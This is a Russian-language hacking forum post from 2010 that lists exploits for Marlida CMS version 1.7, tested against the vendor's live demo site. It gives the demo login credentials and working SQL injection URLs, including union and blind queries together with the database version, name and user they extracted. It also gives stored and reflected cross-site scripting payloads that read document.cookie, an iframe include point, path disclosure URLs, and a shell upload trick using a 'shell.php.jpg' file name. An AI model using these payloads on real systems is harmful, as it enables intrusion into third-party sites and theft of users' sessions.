24.10.2010, 20:42
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Marlida CMS платная (исходников нет)
Данная версия: ver.1.7
________________________________________________
ОФФ САЙТ:http://www.marlida.com/
ЛОГИН/ПАРОЛЬ ДЛЯ ВХОДА (Demo)
username: dexter
password: qdbgtinx
SQL INJECTION
Сообщение от None
http://demo.marlida.com/?d=games&s=alle&u=&rando=1694072435+OR+1=1
Сообщение от None
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=4132'+union+s elect+1,2,3,4+and+'1'='1
Крутим как слепую
Сообщение от None
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=41'+and+ascii (substring((version()),14,1))=103+and+'null'='null
Код:
Code:
version: 4.0.25-Max-log
db: d001f56f
user: d001f56f@localhost
АКТИВНАЯ XSS
В ЧАТЕ
По адрессу http://demo.marlida.com/chat-alle ( нужна авторизация)
кто туда теперь зайдет уже нечего там несможнт отписать постоянно вылетает xss.. так что капкан.
В ПРФИЛЕ
Hobbies: ">alert(document.cookie)
Beliebiges Feld: ТУТ XSS
Noch ein Feld: ТУТ XSS
+
"Marktplatz" выбераем "Kleinanzeigen" или "Immobilien" потом "Neus Inserat augeben"
Artikelbeschreibung: ТУТ XSS
ПАССИВНАЯ XSS
Сообщение от None
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=41">alert(doc ument.cookie)
http://demo.marlida.com/index.php?d=mitglieder&altervon=14&alterbis=99&ort =">alert(document.cookie)&ortdis=0
http://demo.marlida.com/index.php?d=forum&q=">alert(document.cookie)
Код:
Code:
http://demo.marlida.com/box.php?iframe=[INCLUDE]
Пути:
Код:
Code:
http://demo.marlida.com/box.php?box=login&d[]=fotos&s=65&u[]=edit
http://demo.marlida.com/index.php?d[]=
http://demo.marlida.com/index.php?d=jobs&s=list&q=&kat=&ort= ПРОБЕЛ &ortdis=10&alter=
Кто доработает все буду тока рад.
з.ы шелл заливается таким файлом "shell.php.jpg" ток толка нету от картинки так что можно забить..
http://demo.marlida.com/box.php?iframe=hotornot&u=neu
|
|
|